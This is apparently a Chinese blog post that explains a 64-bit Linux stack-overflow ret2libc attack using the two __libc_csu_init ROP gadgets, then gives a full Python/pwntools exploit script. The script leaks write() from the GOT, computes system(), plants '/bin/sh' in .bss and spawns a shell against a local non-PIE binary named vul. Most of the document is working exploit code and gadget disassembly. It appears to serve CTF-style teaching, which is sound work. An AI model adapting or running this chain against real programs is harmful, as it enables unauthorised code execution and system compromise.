64位linux系统:栈溢出+ret2libc ROP attack

网友投稿 450 2022-10-10


64位linux系统:栈溢出+ret2libc ROP attack

配件1

4005f0: 4c 89 ea       mov    %r13,%rdx
4005f3: 4c 89 f6       mov    %r14,%rsi
4005f6: 44 89 ff       mov    %r15d,%edi
4005f9: 41 ff 14 dc    callq  *(%r12,%rbx,8)
4005fd: 48 83 c3 01    add    $0x1,%rbx
400601: 48 39 eb       cmp    %rbp,%rbx
400604: 75 ea          jne    4005f0 <__libc_csu_init+0x40>

利用配件1：把 RBX 置 0、R12 指向一个存放函数指针的内存单元(例如 GOT 表项)，`callq *(%r12,%rbx,8)` 就会调用 `[R12]` 中保存的函数；调用之前 R13、R14、R15 的值分别被装入 RDX、RSI、EDI，因此前三个参数也可控(注意 `mov %r15d,%edi` 只取 R15 的低 32 位，高 32 位被清零，所以第一个参数只能是 32 位以内的值)。调用返回后 RBX 加 1 并与 RBP 比较：不相等则 `jne` 跳回 4005f0 再次调用；相等则顺序落入紧随其后的配件2(0x400606)。所以把 RBP 设为 1，第一次调用结束后 RBX == RBP，执行流顺序进入配件2，其 `add $0x8,%rsp` 加 6 次 pop 共消耗 56 字节栈空间，然后 `retq` 到我们放在这 56 字节之后的下一个返回地址。

配件2

400606: 48 83 c4 08    add    $0x8,%rsp
40060a: 5b             pop    %rbx
40060b: 5d             pop    %rbp
40060c: 41 5c          pop    %r12
40060e: 41 5d          pop    %r13
400610: 41 5e          pop    %r14
400612: 41 5f          pop    %r15
400614: c3             retq

附：攻击脚本 exp.py

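#!/usr/bin/env python3
"""exp.py -- 64-bit stack overflow + ret2libc via the __libc_csu_init gadgets.

The target (./vul) prints "Hello, World\\n" and then reads into a stack buffer;
the original exploit assumes the saved return address sits 136 bytes into that
buffer.  The binary is not PIE (fixed 0x40xxxx / 0x60xxxx addresses), so the
gadgets, GOT and .bss are static and only libc has to be leaked (ASLR).

Three stages, each returning to main() so the next stage gets a fresh overflow:
  1. write(1, write@got, 8)       -> leaks the resolved address of write()
  2. read(0, .bss, 16)            -> we send p64(system) + b"/bin/sh\\0"
  3. call [.bss](.bss + 8, 0, 0)  -> system("/bin/sh")

Gadget 1 (0x4005f0): mov rdx,r13 ; mov rsi,r14 ; mov edi,r15d ;
                     call [r12 + rbx*8] ; add rbx,1 ; cmp rbx,rbp ; jne 0x4005f0
Gadget 2 (0x400606): add rsp,8 ; pop rbx ; pop rbp ; pop r12 ; pop r13 ;
                     pop r14 ; pop r15 ; ret

Only a LOCAL target is supported as written: the write()/system() distance is
read from LIBC_PATH, which must be the very libc that ./vul loads.  Against a
remote target the libc must first be identified from the leak.
"""
import struct
import time

# Fixed addresses of the non-PIE target (from objdump of ./vul).
CSU_POP = 0x400606       # gadget 2
CSU_CALL = 0x4005F0      # gadget 1
MAIN = 0x40057A          # re-entered after every stage so we can overflow again
BSS_ADDR = 0x601040      # scratch: [BSS_ADDR] = &system, [BSS_ADDR + 8] = "/bin/sh\0"
OVERFLOW_OFFSET = 136    # bytes from buffer start to the saved return address
LIBC_PATH = "/lib/x86_64-linux-gnu/libc.so.6"
BANNER = b"Hello, World\n"


def p64(value):
    """Pack an unsigned 64-bit little-endian integer (same bytes as pwntools' p64)."""
    return struct.pack("<Q", value)


def u64(data):
    """Unpack exactly 8 little-endian bytes into an unsigned integer (same as pwntools' u64)."""
    return struct.unpack("<Q", data)[0]


def csu_call(func_ptr, rdi, rsi, rdx, ret_addr):
    """Build a ROP chain that calls *[func_ptr]*(rdi, rsi, rdx) and then returns to *ret_addr*.

    func_ptr is the address of a QWORD that holds the function address (a GOT
    entry, or a .bss slot we filled ourselves), because gadget 1 performs
    ``call [r12 + rbx*8]`` and we pop rbx = 0.

    Register plumbing, in the order gadget 2 pops them:
        rbx = 0        -> call [r12 + 0]
        rbp = 1        -> after the call rbx becomes 1 == rbp, the jne is NOT
                          taken and execution falls through into gadget 2
        r12 = func_ptr
        r13 -> rdx, r14 -> rsi, r15d -> edi   (gadget 1's three movs)
    Falling through into gadget 2 a second time consumes 8 + 6*8 = 56 bytes
    of stack (add rsp,8 plus six pops) before its ret, hence the 56-byte pad
    in front of ret_addr.

    Raises ValueError if rdi does not fit in 32 bits: the gadget only moves
    r15d into edi, so the upper half of rdi is zero whatever we pop into r15.
    """
    if rdi >> 32:
        raise ValueError(f"rdi={rdi:#x} does not fit in edi; gadget 1 only sets the low 32 bits")
    chain = [
        CSU_POP,
        0,          # skipped by `add $0x8, %rsp`
        0,          # rbx
        1,          # rbp
        func_ptr,   # r12
        rdx,        # r13 -> rdx
        rsi,        # r14 -> rsi
        rdi,        # r15 -> edi
        CSU_CALL,
    ]
    return b"".join(p64(q) for q in chain) + b"\x00" * 56 + p64(ret_addr)


def overflow(chain, filler=b"\x00"):
    """Prefix *chain* with OVERFLOW_OFFSET copies of the single-byte *filler* so it lands on the saved return address."""
    return filler * OVERFLOW_OFFSET + chain


def check_leak(leaked, libc_symbol):
    """Reject a leak that cannot be the expected libc symbol.

    ASLR relocates libc by whole pages, so the low 12 bits of the leaked
    pointer must equal those of the symbol in the libc the offset was taken
    from.  A mismatch means a corrupted leak or a different libc on the
    target; stopping here beats calling a bogus "system" address.
    """
    if leaked == 0 or (leaked & 0xFFF) != (libc_symbol & 0xFFF):
        raise RuntimeError(
            f"leaked {leaked:#x} does not match the page offset of symbol {libc_symbol:#x}; "
            "wrong libc or corrupted leak"
        )


def main():
    # pwntools is imported here rather than at module level so the pure chain
    # builders above stay importable (and testable) without it.
    from pwn import ELF, process

    elf = ELF("vul")
    libc = ELF(LIBC_PATH)
    got_write = elf.got["write"]
    got_read = elf.got["read"]
    off_system_addr = libc.symbols["write"] - libc.symbols["system"]
    print(f"got_write: {got_write:#x}")
    print(f"got_read: {got_read:#x}")
    print(f"off_system_addr: {off_system_addr:#x}")

    p = process("./vul")

    # ---- stage 1: write(1, write@got, 8) leaks the libc address of write() ----
    p.recvuntil(BANNER)
    print("\n#############sending payload1#############\n")
    p.send(overflow(csu_call(got_write, rdi=1, rsi=got_write, rdx=8, ret_addr=MAIN), b"A"))
    write_addr = u64(p.recvn(8))  # recvn, not recv(): recv() may return fewer than 8 bytes
    print(f"write_addr: {write_addr:#x}")
    check_leak(write_addr, libc.symbols["write"])
    system_addr = write_addr - off_system_addr
    print(f"system_addr: {system_addr:#x}")

    # ---- stage 2: read(0, .bss, 16) stores &system and "/bin/sh" in .bss ----
    p.recvuntil(BANNER)
    print("\n#############sending payload2#############\n")
    p.send(overflow(csu_call(got_read, rdi=0, rsi=BSS_ADDR, rdx=16, ret_addr=MAIN)))
    # No banner separates the overflowing read from the gadget's read(), so
    # give the target time to consume payload2 first; otherwise the 16 bytes
    # below could be swallowed by the overflow read instead of landing in .bss.
    time.sleep(1)
    # One send for both QWORDs: a single read(0, .bss, 16) returns whatever is
    # in the pipe at that moment, and two separate sends may not both be there.
    p.send(p64(system_addr) + b"/bin/sh\x00")

    # ---- stage 3: call [.bss](.bss + 8, 0, 0) == system("/bin/sh") ----
    p.recvuntil(BANNER)
    print("\n#############sending payload3#############\n")
    # NOTE(review): if system() faults with SIGSEGV on a movaps, the stack is
    # not 16-byte aligned at the call; prepending the lone `ret` at 0x400614
    # to the chain shifts it by 8 -- confirm against the target.
    p.send(overflow(csu_call(BSS_ADDR, rdi=BSS_ADDR + 8, rsi=0, rdx=0, ret_addr=MAIN)))

    p.interactive()


if __name__ == "__main__":
    main()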

